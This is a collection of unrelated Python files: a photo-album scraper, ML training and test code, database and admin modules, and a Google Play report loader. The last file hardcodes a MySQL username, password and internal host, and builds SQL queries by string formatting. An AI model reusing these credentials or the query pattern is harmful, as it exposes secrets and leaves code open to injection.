#有全部的
def parse_album_url_total(self, response):
hxs=Selector(response)
items=hxs.xpath('//*[@class="igalleryli_div"]/a/@href').extract()
print("item len : %s " % len(items))
tmp_cnt = 0;
for i in range(len(items)):#遍历div个数
#需要访问的下个url, Examples: https://www.nvshens.com/g/22942/
album_url = g_main_host + items[i]
print("AX --> request album url : "+album_url)
yield Request(url=album_url, callback=self.parse_album)
#debug 只处理一个目录的
#if(tmp_cnt == 0):
# break;
tmp_cnt = tmp_cnt + 1
#print(items[i].split(" ")[1])
def parse_album(self, response):
first_url=response.url #爬取时请求的url
print("first_page:"+first_url)
hxs=Selector(response)
album_name = hxs.xpath('//*[@id="htilte"]').extract()[0]
album_desc = hxs.xpath('//*[@id="ddesc"]').extract()[0]
#album_photo_num = hxs.xpath('//*[@id="dinfo"]/span').extract()
album_desc_info = hxs.xpath('//*[@id="dinfo"]').extract()[0]
#print(album_name)
#print(album_desc)
#print(album_desc_info)
photoAlbum = XiaMeiPhotoAlbum()
photoAlbum['photos'] = []
photoAlbum['create_time'] = time.time()
photoAlbum['album_name'] = get_html_content(album_name)
#print(photoAlbum['album_name'])
photoAlbum['album_desc'] = get_html_content(album_desc)
#print(photoAlbum['album_desc'])
photoAlbum['album_desc_info'] = get_html_content(album_desc_info)
#print(photoAlbum['album_desc_info'])
#print("AX ---> org id:")
#print(id(photoAlbum))
save_photo(response, photoAlbum)
#print("AX ---> next page...")
all_next_page = hxs.xpath('//*[@id="pages"]/a/@href').extract()
next_page = all_next_page[-1]
next_page_url = g_main_host+next_page
#print("first next page")
#print(next_page_url)
yield Request(url=next_page_url, meta={'album':photoAlbum, 'first':first_url}, callback=self.parse_album_next_pages_new)
g_photoAlbumList.append(photoAlbum)
def parse_album_next_pages_new(self, response):
photoAlbum = response.meta['album']
save_photo(response, photoAlbum)
first_url = response.meta['first']
all_next_page = response.xpath('//*[@id="pages"]/a/@href').extract()
next_page = all_next_page[-1]
next_page_url = g_main_host+next_page
#print( "find next page" )
#print(first_url)
#print( next_page_url )
if ".html" in next_page_url:
#print(next_page_url)
yield Request(url=next_page_url, meta={'album':photoAlbum, 'first':first_url}, callback=self.parse_album_next_pages_new)
def closed(self, reson):
if g_export_photo == False:
print("AX dont export photos..")
return
print("AX closed --> album len %s" % (len(g_photoAlbumList)))
album_index = 1
for album in g_photoAlbumList:
#创建目录
#album_number_str = str(album_index).zfill(3)
album_number_str = ""
album_name = g_export_path_root + "/" +str(self.g_girl_identifier) + "_" + self.f_girl_name + "/"+album_number_str +"_"+ album["album_name"]
album_index = album_index + 1
if not os.path.exists( album_name ):
os.makedirs( album_name )
print("create album path :"+album_name)
#下载图片
print("all photo num :"+str(len(album['photos'])))
for photo_url in album['photos']:
photo_name = photo_url.split('/')[-1]
photo_save_path = album_name+"/"+photo_name
if not os.path.exists( photo_save_path ):
print("download photo :"+photo_url)
#urllib.urlretrieve(photo_url, photo_save_path)
photo_content = get_page_source(photo_url)
if photo_content != 0:
f = open(photo_save_path, 'wb')
f.write(photo_content)
f.close()
print(len(photo_content))
else:
print("404 found ..")
else:
print("photo exists... :"+photo_save_path)
#print(photo_url)
"""
print(len(album['photos']))
for photo_url in album['photos']:
print(photo_url)
"""
|
17,011 | 976bbc1c7c1a362337a6802b8ffa07985ba140c9 | '''To run these, run the following
pip install pytest
pytest (this file name)
'''
import os
import tensorflow as tf
import pytest
import numpy as np
from data_loader_wrapper import DataSplits
from run_from_config import EarlyStoppingHelper
from run_from_config import SAVE_EARLY_STOPPING_ACTION
from run_from_config import CONTINUE_EARLY_STOPPING_ACTION
from run_from_config import STOP_EARLY_STOPPING_ACTION
from run_from_config import run_from_config
from run_from_config import verify_restore_location
from run_from_config import run_epoch
import layer_models
from network_config import CrossEntropyLossInfo
from network_config import loss_info_from_dict
from network_config import NetworkConfig
from network_config import optimizer_info_from_dict
from network_graph import parameters_for_config_id
from network_graph import count_parameters
from network_graph import accuracy_ops
from storage import FolderPicker
@pytest.fixture()
def mock_config_id():
return 'test_config_id'
@pytest.fixture()
def mock_network_config(mock_config_id):
layers = layer_models.layers_from_list([
{'type': 'softmax_pred', 'num_classes': 10, 'id': 'prediction'},
{'type': 'argmax'},
])
return NetworkConfig(
config_id=mock_config_id,
data_provider_name='cifar10',
batch_size=1,
seed=1,
loss=loss_info_from_dict(
{'type': 'softmax_crossentropy', 'softmax_id': 'prediction'},
layers,
),
epochs=1,
layers=layers,
early_stop_after_n_epochs=1,
prediction_layer_idx=-1, # We don't use this, so put garbage number
optimizer_kwargs={},
)
# test early stopping helper
class TestEarlyStoppingHelper():
EARLY_STOP_AFTER_N = 3
def test_smoke(self):
es = EarlyStoppingHelper(self.EARLY_STOP_AFTER_N)
# first add a case where we should save
assert es.action_given_accuracy(0, 0.5) == SAVE_EARLY_STOPPING_ACTION
# then add something with a worse accuracy
assert es.action_given_accuracy(1, 0) == CONTINUE_EARLY_STOPPING_ACTION
# then add another thing with accuracy, but not as good as the first time
assert es.action_given_accuracy(2, 0.25) == CONTINUE_EARLY_STOPPING_ACTION
# then add something with great accuracy
assert es.action_given_accuracy(3, 1) == SAVE_EARLY_STOPPING_ACTION
# now do EARLY_STOP_AFTER_N rounds of worse accuracy
for i in range(self.EARLY_STOP_AFTER_N):
assert es.action_given_accuracy(4 + i, 0) == CONTINUE_EARLY_STOPPING_ACTION
# then the early stopping should kick in
assert es.action_given_accuracy(4 + self.EARLY_STOP_AFTER_N, 0) == STOP_EARLY_STOPPING_ACTION
# and if accidentally keep going, it should continue giving the same result
assert es.action_given_accuracy(5 + self.EARLY_STOP_AFTER_N, 0) == STOP_EARLY_STOPPING_ACTION
# and the best epoch should still be 3
assert es.best_epoch == 3
def test_disabled(self):
es = EarlyStoppingHelper()
# the only difference in this case is that it never says to stop
# first add a case where we should save
assert es.action_given_accuracy(0, 0.5) == SAVE_EARLY_STOPPING_ACTION
# then add something with a worse accuracy
assert es.action_given_accuracy(1, 0) == CONTINUE_EARLY_STOPPING_ACTION
# then add another thing with accuracy, but not as good as the first time
assert es.action_given_accuracy(2, 0.25) == CONTINUE_EARLY_STOPPING_ACTION
# then add something with great accuracy
assert es.action_given_accuracy(3, 1) == SAVE_EARLY_STOPPING_ACTION
# now do EARLY_STOP_AFTER_N rounds of worse accuracy
for i in range(100):
assert es.action_given_accuracy(4 + i, 0) == CONTINUE_EARLY_STOPPING_ACTION
class TestCapsnet():
CAPSNET_CONFIG = 'config/sample_capsnet.yaml'
def test_var_count(self, tmpdir):
p = tmpdir.mkdir("capsnettest")
network_config = NetworkConfig.parse_config(self.CAPSNET_CONFIG)
run_from_config(
str(p),
network_config,
True,
None,
)
variables = parameters_for_config_id(network_config)
# mnist capsnet set up like aguron's notebook should have this many params
assert count_parameters(variables) == 8215568
class TestRestore():
def test_bad_last_folder(self, mock_config_id, mock_network_config):
with pytest.raises(ValueError):
verify_restore_location(mock_network_config, mock_config_id + '/somethingelse')
def test_bad_last_folder(self, mock_config_id, mock_network_config):
with pytest.raises(ValueError):
verify_restore_location(mock_network_config, 'something/123')
def test_good(self, mock_config_id, mock_network_config):
assert verify_restore_location(mock_network_config, 'b/a/' + mock_config_id + '/123') == ('b/a', '123')
def test_good_trailing_slash(self, mock_config_id, mock_network_config):
assert verify_restore_location(mock_network_config, 'b/a/' + mock_config_id + '/123/') == ('b/a', '123')
# Make a test for each config
@pytest.mark.parametrize("config_path", [
os.path.join('config/', filename)
for filename in os.listdir('config/')
])
def test_all_configs(tmpdir, config_path):
# This test just crashes if one of the configs can't be
# loaded or built
p = tmpdir.mkdir("smoke_test")
print(config_path)
tf.reset_default_graph()
network_config = NetworkConfig.parse_config(config_path)
run_from_config(
str(p),
network_config,
is_debug=True,
)
variables = parameters_for_config_id(network_config)
print(config_path, count_parameters(variables))
class TestAccuracy():
def test_compute_accuracy_with_diff_shapes(self, mock_network_config):
targets_placeholder = tf.placeholder(
np.int64,
[mock_network_config.batch_size],
'data-targets'
)
fake_inputs = np.ones((1, 32, 32)).astype(np.int64)
fake_targets = np.ones(1)
with tf.Session() as sess:
with pytest.raises(Exception):
acc = accuracy_ops(
mock_network_config,
targets_placeholder,
[layer_models.LayerResult(None, fake_inputs)],
)
acc.eval(feed_dict={targets_placeholder: fake_targets})
def test_compute_accuracy(self, mock_network_config):
batch_size = 2
targets_placeholder = tf.placeholder(
np.int64,
[batch_size],
'data-targets'
)
fake_inputs = np.ones((batch_size)).astype(np.int64)
fake_targets = np.ones(batch_size)
fake_targets_bad = np.zeros(batch_size)
fake_targets_both = np.hstack((
np.zeros(1),
np.ones(1),
))
with tf.Session() as sess:
acc = accuracy_ops(
mock_network_config,
targets_placeholder,
[layer_models.LayerResult(None, fake_inputs)],
)
assert np.isclose(acc.eval(feed_dict={targets_placeholder: fake_targets}), 1)
assert np.isclose(acc.eval(feed_dict={targets_placeholder: fake_targets_bad}), 0)
assert np.isclose(acc.eval(feed_dict={targets_placeholder: fake_targets_both}), 0.5)
class MockDataProivder():
def __init__(self, data):
self.data = data
self.i = 0
self.num_batches = len(data)
def __next__(self):
if self.i >= len(self.data):
raise StopIteration()
d = self.data[self.i]
self.i += 1
return d
def __iter__(self):
return self
class TestRunEpoch():
NUM_BATCHES = 10
def test_run_epoch_0s(self, mock_network_config):
fake_data = np.zeros((self.NUM_BATCHES, 2))
data_splits = DataSplits(
train_data=MockDataProivder(fake_data),
val_data=[],
test_data=[],
)
def runner_func(input_batch, target_batch):
return (0, 0)
stats = run_epoch(
1,
mock_network_config,
data_splits,
'train_data',
runner_func
)
assert stats.accuracy == 0
assert stats.loss == 0
def test_run_epoch_mix(self, mock_network_config):
fake_data = np.zeros((self.NUM_BATCHES, 2))
data_splits = DataSplits(
train_data=MockDataProivder(fake_data),
val_data=[],
test_data=[],
)
FAKE_ACCURACY = 10
FAKE_LOSS = -55
def runner_func(input_batch, target_batch):
return (FAKE_LOSS, FAKE_ACCURACY)
stats = run_epoch(
1,
mock_network_config,
data_splits,
'train_data',
runner_func
)
# The average of a bunch of things that are the same is that thing
assert stats.accuracy == FAKE_ACCURACY
assert stats.loss == FAKE_LOSS
class TestFolderPicker():
def test_stats_folder_race_condition(self, tmpdir, mock_network_config):
p = tmpdir.mkdir("capsnettest")
# First time should be fine
FolderPicker(str(p), mock_network_config, '123')
# second time should raise
with pytest.raises(Exception):
FolderPicker(str(p), mock_network_config, '123')
def test_optimizer_info_from_dict():
assert optimizer_info_from_dict({})._asdict() == {
'learning_rate': 1e-3,
'beta1': 0.9,
}
assert optimizer_info_from_dict(
{'learning_rate': 5})._asdict() == {
'learning_rate': 5,
'beta1': 0.9,
}
assert optimizer_info_from_dict(
{'beta1': 5})._asdict() == {
'learning_rate': 1e-3,
'beta1': 5,
}
with pytest.raises(Exception):
optimizer_info_from_dict({'fake key': 1})
|
17,012 | 1669fd7dac22aac2d84f002f09c5c8a07ae241a5 | from lib.database import db
import lib.security as security
from lib.common_engine_functions import get_next_available_id, property_is_unique, save_document, get_all_documents
from datetime import datetime
def create(room, payer, receiver, amount, method):
id = get_next_available_id('transactions')
post = {
'_id': id,
'room': room,
'payer': payer,
'receiver': receiver,
'amount': amount,
'method': method,
'timestamp': datetime.utcnow()
}
db['transactions'].insert_one(post)
return post
def get_all(room):
return [transaction for transaction in db['transactions'].find({'room':room})]
# Need function to accumulate old payments into summarized entries
def combine_old(room):
pass |
17,013 | ef04bc9afbdb5f96806d281376c5b6de46a3a7a0 | import pickle
import cv2
import numpy as np
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D,MaxPooling2D,Dense,Flatten
from tensorflow.keras.optimizers import Adam
from sklearn.utils import shuffle
files=["sci.pkl","pal.pkl","roc.pkl"]
features=[]
labels=[]
for i in range(0,len(files)):
data=pickle.load(open(files[i],"rb"))
for img in range(0,3001):
features.append(data[img]/255)
labels.append(i)
features,labels=shuffle(features,labels)
features,labels=np.array(features),np.array(labels)
features=features.reshape(len(features),112,63,1)
model=Sequential()
model.add(Conv2D(1024,activation='relu',kernel_size=(4,4),input_shape=(112,63,1)))
model.add(MaxPooling2D(pool_size=(4,4)))
model.add(Conv2D(256,activation='relu',kernel_size=(4,4)))
model.add(MaxPooling2D(pool_size=(4,4)))
model.add(Flatten())
model.add(Dense(64,activation='relu'))
model.add(Dense(3,activation='softmax'))
model.compile(loss="sparse_categorical_crossentropy",optimizer=Adam(learning_rate=1e-3),metrics=['accuracy'])
model.summary()
model.fit(features,labels,epochs=2,batch_size=16)
model.save("model.h5")
|
17,014 | 19aa1a5ab3918daa3c1571262064a920435e1863 | #!/usr/bin/env python
from distutils.core import setup, Extension
EXTENSIONS = [dict(name="donuts.emd",
sources=["donuts/emd/pyemd.c", "donuts/emd/emd.c"],
extra_compile_args=['-g'])]
opts = dict(name='donuts',
packages=['donuts',
'donuts.emd',
'donuts.deconv',
'donuts.data',
'donuts.spark'],
ext_modules = [Extension(**e) for e in EXTENSIONS])
if __name__ == '__main__':
setup(**opts)
|
17,015 | b20ccbe5cb9a2151fc2fc83310b9d17eb768a223 | import pandas as pd
from torch.utils.data import Dataset
from torchvision.datasets.folder import default_loader as read_image
from pathlib import Path
import torch
class FrameWindowDataset(Dataset):
"""
Just like FrameFolderDataset, but its output is different.
Here, for every frame t, we return a 4D tensor of size [T, C, H, W] where:
T is the "time" component (ie multiple frames)
C, H, W are the usual dimensions for an image (color, height, width).
The size of T is determined by the window size.
Given we can't see the future, we stack every frame at time t
with t-1, t-2, ..., t-window_size and align it with the label for t.
Windows do overlap each other.
"""
def __init__(
self,
root,
label_itos=['negative', 'positive'],
transform=None,
window_size=3,
overlapping=True,
):
self.root = Path(root)
self.label_itos = label_itos
self.label_stoi = {label: i for i, label in enumerate(self.label_itos)}
self.transform = transform
self.window_size = window_size
self.overlapping = overlapping
self.chunks = self._chunkify()
def __len__(self):
return len(self.chunks)
def __getitem__(self, idx):
chunk = self.chunks[idx]
label = self.label_stoi[chunk.iloc[-1][
'label']] # Cannot see future, so label comes from last from input
images = [
read_image(self.root / image_path)
for image_path in chunk['image_path']
]
if self.transform:
images = [self.transform(image) for image in images]
return torch.stack(images, dim=0), label
def _chunkify(self):
df = pd.read_csv(self.root / 'data.csv')
subsets = []
offset = 1 if self.overlapping else self.window_size
for start in range(0, df.shape[0], offset):
if df.shape[0]-start < self.window_size:
break
df_subset = df.iloc[start:start + self.window_size]
subsets.append(df_subset)
return subsets
def __repr__(self):
message = (f"FrameWindowDataset with {len(self)} samples.\n")
return message
|
17,016 | 76f02f903b216362565b8c29fa257a158a8b3869 | """empty message
Revision ID: f0538225efd3
Revises: 4b4604d66bb5
Create Date: 2021-08-22 21:36:12.376499
"""
# revision identifiers, used by Alembic.
revision = 'f0538225efd3'
down_revision = '4b4604d66bb5'
from alembic import op
import sqlalchemy as sa
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('pitch', sa.Column('user_id', sa.Integer(), nullable=False))
op.create_foreign_key(None, 'pitch', 'users', ['user_id'], ['id'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'pitch', type_='foreignkey')
op.drop_column('pitch', 'user_id')
# ### end Alembic commands ###
|
17,017 | 29e50fb67816182be02a57e61a27fab0235ff457 | INVALID_JSON = "INVALID_JSON"
HANDLER_CRASHED = "HANDLER_CRASHED"
SMS_NOT_CONFIGURED = "SMS_NOT_CONFIGURED"
SMS_COULD_NOT_BE_SENT = "SMS_COULD_NOT_BE_SENT"
TWILIO_NOT_SETUP = "TWILIO_NOT_SETUP"
|
17,018 | 39a417e4ad8fd441c397f34f7e3db37796633ee6 | from django.contrib import admin
from .models import Access, SetCtarl
@admin.register(Access)
class AccessAdmin(admin.ModelAdmin):
# 设置模型字段,用于Admin后台数据的表头设置
list_display = ['id', 'date', 'num']
# 过滤器
list_filter = ['id', 'date', 'num']
# 设置可搜索的字段并在Admin后台数据生成搜索框,如有外键应使用双下划线连接两个模型的字段
search_fields = ['id', 'date', 'num']
# 设置排序方式
ordering = ['-id']
refresh_times = [5, 2] # 自动刷新后台管理页面
@admin.register(SetCtarl)
class SetCtarlAdmin(admin.ModelAdmin):
# 设置模型字段,用于Admin后台数据的表头设置
list_display = ['id', 'name', 'is_start']
# 过滤器
list_filter = ['id', 'name', 'is_start']
# 设置可搜索的字段并在Admin后台数据生成搜索框,如有外键应使用双下划线连接两个模型的字段
search_fields = ['id', 'name', 'is_start']
# 设置排序方式
ordering = ['-id']
refresh_times = [5, 2] # 自动刷新后台管理页面
|
17,019 | 95ccd702e35801a80409c2f9ee6804cd9f722e3d | import sys
import time
from functools import reduce
import database_connector
import movie
import numpy as np
from sklearn.neural_network import MLPRegressor
from sklearn.model_selection import train_test_split
import ratingPredictor
def mltesting(movies):
nn = MLPRegressor(hidden_layer_sizes=100, activation="logistic", solver="adam", verbose=True, max_iter=3000)
x = []
y = []
for line in movies:
mlmovie = [line.runtimeMinutes, line.startYear, line.numVotes]
for i in range(10):
try:
mlmovie.append(line.actors[i].nconst[2:])
mlmovie.append(line.actors[i].ordering)
except IndexError:
mlmovie.append(0)
mlmovie.append(0)
print(mlmovie)
x.append(mlmovie)
y.append(line.averageRating)
x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=1, test_size=0.3)
x_train = np.array(x_train)
x_test = np.array(x_test)
nn.fit(x_train.astype(np.float64), y_train)
print(nn.score(x_test.astype(np.float64), y_test))
# print(nn.predict([[120, 2005, 60000]]))
def printallmovies(movies):
for movie in movies:
print(movie.getAsList())
# Gibt zeit und prozent aus
def _secondsToStr(t):
return "%d:%02d:%02d.%03d" % reduce(lambda ll, b: divmod(ll[0], b) + ll[1:], [(t * 1000,), 1000, 60, 60])
def _print_progress(p, start_time):
sys.stdout.write("\r" + str(p) + "% \t Time elapsed: " + _secondsToStr(time.time() - start_time) + "s")
sys.stdout.flush()
#Lädt die Filme aus der Datenbank ins Python Programm, befüllt das array movies
def loadDataBase():
start_time = time.time()
counter = 1
odd = True
db = database_connector.DataBase()
movies = []
print("Loading Database...")
query = db.get_valid_movies()
total = len(query)
for line in query:
newMovie = movie.Movie(line)
newMovie.addActors(db.get_crew_of_movie(newMovie.id))
movies.append(newMovie)
percentage = (counter / total) * 100
if (odd == True):
_print_progress(round(percentage, 2), start_time)
counter = counter + 1
odd = False
else:
odd = True
counter = counter + 1
db.closeConnection()
print("\nDatabase loaded.")
return movies
def createMovie(title,startYear, runtime, genre1, genre2, genre3, numVotes):
genres = "" + genre1
if genre2 != "":
genres = genres + "," + genre2
if genre3 != "":
genres = genres + "," + genre3
array = [0,title,startYear, runtime,genres,0,numVotes]
newMovie = movie.Movie(array)
return newMovie
def updateAvgRatings():
start_time = time.time()
counter = 1
db = database_connector.DataBase()
personids = db.get_all_person_id()
print(personids)
total = len(personids)
for person, averageR in personids:
if averageR is None:
avgRating = db.get_averagerating_by_id(person)
db.update_avg_rating(person,avgRating)
percentage = (counter / total) * 100
_print_progress(round(percentage, 2), start_time)
counter = counter + 1
if __name__ == '__main__':
ratingPredictor = ratingPredictor.ratingPredictor(loadDataBase())
ratingPredictor.learn(algorithm='neural')
#print(ratingPredictor.plot_ratings())
#loadDataBase()
ourMovie = createMovie("Wolf ;)",1994,125,"Drama","Horror","Romance",49989)
ourMovie.addCrewByName("Jack Nicholson", "actor")
ourMovie.addCrewByName("Michelle Pfeiffer", "actress")
ourMovie.addCrewByName("James Spader", "actor")
ourMovie.addCrewByName("Ennio Morricone", "composer")
ourMovie.addCrewByName("Mike Nichols", "director")
#ourMovie.addCrewByName("Giuseppe Rotunno", "cinematographer")
ourMovie.addCrewByName("Jim Harrison", "writer")
#ourMovie.addCrewByName("Kate Nelligan", "actress")
ourMovie.addCrewByName("Wesley Strick", "writer")
ourMovie.addCrewByName("Douglas Wick", "producer")
print(ourMovie.getAsString())
print(ratingPredictor.predictMovie(ourMovie))
|
17,020 | 501cd02f8182b73496e07204edc8687c273bf91e | """
5703. Maximum Average Pass Ratio
There is a school that has classes of students and each class will be having a final exam. You are given a 2D integer array classes, where classes[i] = [passi, totali]. You know beforehand that in the ith class, there are totali total students, but only passi number of students will pass the exam.
You are also given an integer extraStudents. There are another extraStudents brilliant students that are guaranteed to pass the exam of any class they are assigned to. You want to assign each of the extraStudents students to a class in a way that maximizes the average pass ratio across all the classes.
The pass ratio of a class is equal to the number of students of the class that will pass the exam divided by the total number of students of the class. The average pass ratio is the sum of pass ratios of all the classes divided by the number of the classes.
Return the maximum possible average pass ratio after assigning the extraStudents students. Answers within 10-5 of the actual answer will be accepted.
"""
class Solution:
def maxAverageRatio(self, classes, extraStudents):
ratios = {}
for a_class in classes:
ratios[a_class[0] / a_class[1]] = a_class
for i in range(extraStudents):
key = min(ratios)
min_class = ratios[key]
print(min_class)
min_class[0] += 1
min_class[1] += 1
ratios.pop(key)
ratios[min_class[0]/min_class[1]] = min_class
print(ratios)
return sum(ratios.keys()) / len(ratios)
if __name__ == "__main__":
s = Solution()
print(s.maxAverageRatio([[1,2],[3,5],[2,2]], 2))
#print(s.maxAverageRatio([[2,4],[3,9],[4,5],[2,10]], 3))
|
17,021 | e368bff8795aba317cbcfceacefd294264f3c6e9 | #%%
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from agent import Agent
#%% Q-table
# Plot max Q for each position
q = np.load('qtables/agent1.npy')
q = np.max(q, axis=2)
fig, ax = plt.subplots(1, 1)
sns.heatmap(np.flip(q, 1).transpose(), annot=True)
plt.show()
#%% Best move
q = np.load('qtables/agent1.npy')
m = np.argmax(q, 2)
m = np.flip(m, 1).transpose()
d = np.full(m.shape, ' ', dtype='<U2')
for i in range(m.shape[0]):
for j in range(m.shape[1]):
d[i, j] = Agent.mov2dir[m[i, j]].rjust(2)
print(d)
print(m)
#%% Position heat map
# Plot number of times each tile was visited
bhist = np.load('board_hist.npy')
fig, ax = plt.subplots(1, 1)
sns.heatmap(np.flip(bhist, 1).transpose(), annot=True)
ax.set_title(f'sum={bhist.sum()}')
plt.show()
#%% Learning history
# Number of steps required to reach the goal
hist = pd.read_csv('hist.csv')
hist = hist.rolling(25).mean()
plt.plot(hist['steps'])
plt.show()
#%%
|
17,022 | 956303d1b427a0771f717dd69241457eb23cdf20 | #!/usr/bin/python
#coding=utf-8
class Test():
def prt(self):
print(self);
print(self.__class__);
t=Test();
t.prt();
|
17,023 | e512a842799a0785c5a31ffa2b69460af33d6338 | import numpy as np
import matplotlib.pyplot as plt
def mergeA_with_average(lab_A, lab_B):
laba_hash = {}
labb_hash = {}
lab_a_list = list()
lab_b_list = list()
laba_handler = open(lab_A, "r")
labb_handler = open(lab_B, "r")
for line in laba_handler.readlines():
split_a_line = line.split(" ")
split_a_key = split_a_line[0]
split_a_value = split_a_line[1].rstrip()
laba_hash[split_a_key] = float(split_a_value)
for line in labb_handler.readlines():
split_b_line = line.split (", ")
split_b_key = split_b_line[0]
split_b_value = split_b_line[1].rstrip()
labb_hash[split_b_key] = float(split_b_value)
laba_handler.close()
labb_handler.close()
all_keys = list(laba_hash.keys() | labb_hash.keys())
for key in all_keys:
lab_a_list.append(laba_hash.get(key, 0))
lab_b_list.append(labb_hash.get(key, 0))
labaarray = np.array(laba_hash.keys())
labbarray = np.array(labb_hash.keys())
bins = np.linspace(0,125, num=125)
plt.hist(laba_hash.values(), bins, alpha = 1, edgecolor = "white", color = "red", label= "Grpup A")
plt.hist(labb_hash.values(), bins, alpha = 0.5, edgecolor ="white", color = "blue", label = "Group B")
plt.yticks(range(0, 20, 3))
plt.xticks(range(0, int(max(laba_hash.values()))+1, 10))
plt.xlabel("Value range")
plt.ylabel("Count")
plt.legend(loc='upper right')
plt.show()
if __name__ == '__main__':
mergeA_with_average("results_labA.dat", "results_labB.dat")
|
17,024 | 653bae7ee9ecf5a27c7194a1e81fa634d97844ae | # -*- coding: utf-8 -*-
import os
import c4d
import operator
class Utility(object):
@staticmethod
def __is_texture_relative(texture_path):
if not len(os.path.split(texture_path)[0]):
return False
else:
if texture_path[:1] == "." or texture_path[:1] == os.path.sep or texture_path[:1] == "/":
return True
return False
@staticmethod
def select_material(mats):
doc = c4d.documents.GetActiveDocument()
for tex in mats:
doc.SetActiveMaterial(tex["material"], c4d.SELECTION_ADD)
c4d.EventAdd()
@staticmethod
def resize_bmp(bmp, x, y):
if bmp is None:
return
final_bmp = c4d.bitmaps.BaseBitmap()
final_bmp.Init(x, y)
bmp.ScaleBicubic(final_bmp, 0, 0, bmp.GetBw() - 1, bmp.GetBh() - 1, 0, 0, final_bmp.GetBw() - 1, final_bmp.GetBh() - 1)
return final_bmp
|
17,025 | 4fa17fe040037a32fe8012f10646999eec392dc5 | # The function of this script is to use the Google Cloud API to download reports from the Google play store. This script will download the monthly reports
# that Google provides from the Google Play Store, then those csv's are parsed in order to grab relevent data, and then all of the relevent data
# that is to be put in the database is inserted into the operation database.
import io
from apiclient.http import MediaIoBaseDownload
import json
import csv
from httplib2 import Http
from oauth2client.service_account import ServiceAccountCredentials
from apiclient.discovery import build
import datetime
import os
import mysql.connector
import sys
# This method gets respective data (defined by type_data and year_month passed in) from the Google Cloud. Once it downloads that csv it will open the csv
# and get all of the data and return it as a dict keyed by the date. It then deletes the csv that it downloaded from Google Cloud.
def get_data(year_month, type_data ,subtype_data, json_file):
report_to_download = type_data + '_com.metropia.activities_' + year_month + subtype_data + '.csv' # path in google bucket to report
data_dict = {} # this is where all of the data will be returned
print type_data # for debugging/logging purposes
output_file_name = (type_data + subtype_data + '_' + year_month + '.csv').replace('/', '') # have to get rid of '/' beacuse can't have those in file name
try:
credentials = ServiceAccountCredentials.from_json_keyfile_name(json_file, 'https://www.googleapis.com/auth/devstorage.read_only')
except:
print 'Error occured while loading credentials from json_file. Most likely incorrect path. Path given is: %s' % json_file
sys.exit(1) # terminating with failure
storage = build('storage', 'v1', http=credentials.authorize(Http())) # creating storage object
result = storage.objects().get_media(bucket=cloud_storage_bucket, object=report_to_download) # gets payload data from Google Cloud
print 'creating %s' % output_file_name # for debugging/logging purposes
file_to_download = io.FileIO(output_file_name, mode='w') # initializes file_to_download so data can be written to a csv from bytes
downloader = MediaIoBaseDownload(file_to_download, result, chunksize=1024*1024) # defining the downlaoder
done = False # variable to see when download is done
while not done:
status, done = downloader.next_chunk() # goes through chunk by chunk until the entire file is downloaded, done will be set equal to true when the last chunk is downloaded
file_to_download.close() # once file is downloaded, we can close the FileIO
data_initial = open(output_file_name) # opens the recently downloaded file whose encoding is ISO-8859-1 (<-- not sure if relevant)
data = csv.reader((line.replace('\0','') for line in data_initial), delimiter=",") # ignores all null lines in CSV file (<-- not sure if necessary)
iter_data = iter(data) # in order to skip the headers, have to make an iterable and skip the first row
next(iter_data) # skipping the first row
for row in iter_data: # is going through all of the data
try:
data_dict[row[0]] = row[2:] # creating the dictionary
except IndexError, detail: # if it doesn't have all of the data in the specific date
continue
data_initial.close() # closing the file
print 'deleting %s' % output_file_name
os.remove(output_file_name) # deleting the file downlaoded from Google, because it was already parsed for all relevent data
return data_dict # returning the data
# This method takes in the lists of install, crash, and rating data and returns one list of all the data
# combined in the format we want. This makes it much easier to write the data into a csv and to write it to the
# database.
def combine_lists(install, crash, rating):
total_data = [] # initializing the lists that I will use
crash_list = []
for date, array in rating.iteritems(): # iterating through rating because rating has every date in it, because it has the total average rating
# there aren't crashes everyday, so it is possible that the crash list doesn't have every date, which is why checking is necessary
if date in crash: # if there is crash in that date
crash_list = crash[date]
else: # if there is no crash data for that particular date
crash_list = [0, 0]
total_data.append(install[date] + crash_list + array + [date]) # appending all of the to the final list
return total_data # returning the array which contains all of the data
# This method creates and returns a connection to the MySQL database logged in with Eddie's account.
def DB_connect():
cnxn = mysql.connector.connect(user='eddie', password='eddie1234',
host='192.168.1.95', port = 3306,
database='ops')
return cnxn
# This method writes the data to the output that we want. As of now it takes in a csv file name, but it is possible for it to take in a name of a
# table and then write all of the data to a database (which is the future plan once the data is approved)
def write_to_output(data):
cnxn = DB_connect() # connecting to the db
cursor = cnxn.cursor() # establishing a cursor
table_name = 'google_extra_store' # the name of the table it is writing to
for i in data: # iterating through all of the data
values = (i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7], i[8], i[9], i[10], i[11], i[12])
sql = 'insert into %s (%s.CurrentDeviceInstalls, %s.DailyDeviceInstalls, %s.DailyDeviceUninstalls, %s.DailyDeviceUpgrades, %s.CurrentUserInstalls, %s.TotalUserInstalls, %s.DailyUserInstalls, %s.DailyUserUninstalls, %s.DailyCrashes, %s.DailyANRs, %s.DailyAverageRating, %s.TotalAverageRating, %s.ReportDate)' % (table_name, table_name, table_name, table_name, table_name, table_name, table_name, table_name, table_name, table_name, table_name, table_name, table_name, table_name)
sql += ' values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, \'%s\')' % values
#print sql.encode('utf-8')
cursor.execute(sql.encode('utf-8'))
cnxn.commit()
# This table gets a table_name, and returns the last time the table was updated, it will then return a date objcet
# that contains that data. This is necessary so no repeated data gets added to the db
def get_last_update_time():
cnxn = DB_connect() # connecting to the db
cursor = cnxn.cursor() # establishing a cursor
table_name = 'google_extra_store'
sql_statement = 'select %s.ReportDate FROM %s order by %s.ReportDate desc LIMIT 1;' % (table_name, table_name, table_name) # getting the latest date
cursor.execute(sql_statement) # executing the sql and storing the data
data = cursor.fetchone()[0] # getting the last date
cursor.close() # closing everything
cnxn.close()
return data # returning the date object
client_email = '587666638625-mv4u63duf2ge9eqlstgnonglifrt0e2c@developer.gserviceaccount.com' # client email which sends us reports
json_file = 'Google Play Analytics-a1233ad04d40.json' # json file in directory that grants us access to the service account service
